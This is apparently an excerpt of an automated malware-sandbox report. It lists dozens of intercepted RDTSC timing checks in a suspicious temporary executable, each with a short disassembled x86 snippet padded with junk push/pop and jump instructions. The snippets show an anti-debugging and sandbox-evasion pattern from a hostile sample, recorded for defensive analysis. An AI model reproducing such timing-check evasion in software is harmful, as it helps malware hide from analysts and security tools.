                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0D8CB second address: E0D8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F3430D3ED5Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E0DA33 second address: E0DA4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3430D3497Dh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E12AE7 second address: E12B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3430D3ED36h 0x0000000a jmp 00007F3430D3ED45h 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E12B07 second address: E12B34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3430D34988h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E19B1E second address: E19B3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3430D3ED3Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F3430D3ED36h 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E1A0BD second address: E1A0D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D34986h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E1A37B second address: E1A3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED41h 0x00000007 jmp 00007F3430D3ED47h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F3430D3ED3Bh 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E1A3B2 second address: E1A3B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E192A2 second address: E192A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E192A6 second address: E192BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3430D34976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007F3430D34976h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E213D3 second address: E213E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED3Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E2F722 second address: E2F727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E2F727 second address: E2F72E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E2F72E second address: E2F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F3430D34988h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E331D2 second address: E331EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3430D3ED40h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E32E19 second address: E32E3C instructions: 0x00000000 rdtsc 0x00000002 js 00007F3430D34978h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F3430D34982h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E32F70 second address: E32F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3430D3ED3Dh 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E32F84 second address: E32F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E347D0 second address: E347D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E360B6 second address: E360F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jo 00007F3430D349A4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3430D34988h 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E360F1 second address: E360FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E43316 second address: E43333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D34987h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E43333 second address: E43337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4525C second address: E4528F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3430D34986h 0x0000000c jmp 00007F3430D34984h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4528F second address: E45296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E45296 second address: E452C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F3430D34999h 0x00000010 jmp 00007F3430D34982h 0x00000015 jmp 00007F3430D34981h 0x0000001a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E450BE second address: E450C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E450C4 second address: E450CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4FD52 second address: E4FD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4FD56 second address: E4FD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4EC29 second address: E4EC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3430D3ED36h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3430D3ED36h 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4EC3C second address: E4EC46 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3430D34976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4EEB1 second address: E4EEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4F9E5 second address: E4F9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E4F9F0 second address: E4FA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F3430D3ED45h 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E5132F second address: E51334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E51334 second address: E5133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E5F2AC second address: E5F2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E7459A second address: E745B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3430D3ED38h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E740E3 second address: E740ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3430D34976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E7425B second address: E74281 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3430D3ED3Ch 0x00000008 jmp 00007F3430D3ED3Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F3430D3ED36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E74281 second address: E74285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E74285 second address: E742A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED48h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E742A6 second address: E742AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E742AE second address: E742B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E8C899 second address: E8C8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3497Eh 0x00000009 jl 00007F3430D3497Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E8CA3F second address: E8CA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F3430D3ED36h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E8CE9F second address: E8CEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Ah 0x00000007 jnc 00007F3430D3497Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F3430D349BDh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E8CEC4 second address: E8CEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED44h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3430D3ED41h 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E9150C second address: E91530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3430D34987h 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E91530 second address: E91534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E91708 second address: E9170D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E91793 second address: E91833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3430D3ED47h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F3430D3ED38h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 pushad 0x00000027 mov eax, edi 0x00000029 and di, D73Fh 0x0000002e popad 0x0000002f mov edx, dword ptr [ebp+122D36F5h] 0x00000035 push 00000004h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F3430D3ED38h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov dx, 7CB6h 0x00000055 push edi 0x00000056 xor dword ptr [ebp+12451831h], ebx 0x0000005c pop edx 0x0000005d call 00007F3430D3ED39h 0x00000062 jno 00007F3430D3ED3Eh 0x00000068 push eax 0x00000069 jl 00007F3430D3ED44h 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E91833 second address: E91857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3430D34976h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F3430D3497Ch 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E91857 second address: E9185C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E91AE5 second address: E91B36 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3430D34978h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F3430D3497Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F3430D3497Eh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jne 00007F3430D34987h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E92F7B second address: E92F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E92F7F second address: E92FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3430D3497Bh 0x0000000e jo 00007F3430D3497Ch 0x00000014 jne 00007F3430D34976h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007F3430D34976h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E92FB6 second address: E92FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F3430D3ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: E92FC2 second address: E92FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D34987h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A00FC second address: 53A0102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0102 second address: 53A0106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0106 second address: 53A010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A010A second address: 53A0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F3430D34980h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 mov ebx, 7E13BAF0h 0x00000018 pop edx 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F3430D34987h 0x00000026 sub al, 0000004Eh 0x00000029 jmp 00007F3430D34989h 0x0000002e popfd 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0172 second address: 53A0176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0176 second address: 53A017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A017A second address: 53A0180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0ED0 second address: 53C0ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0ED4 second address: 53C0EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0EEF second address: 53C0F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0F13 second address: 53C0F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0F17 second address: 53C0F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0F1D second address: 53C0F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
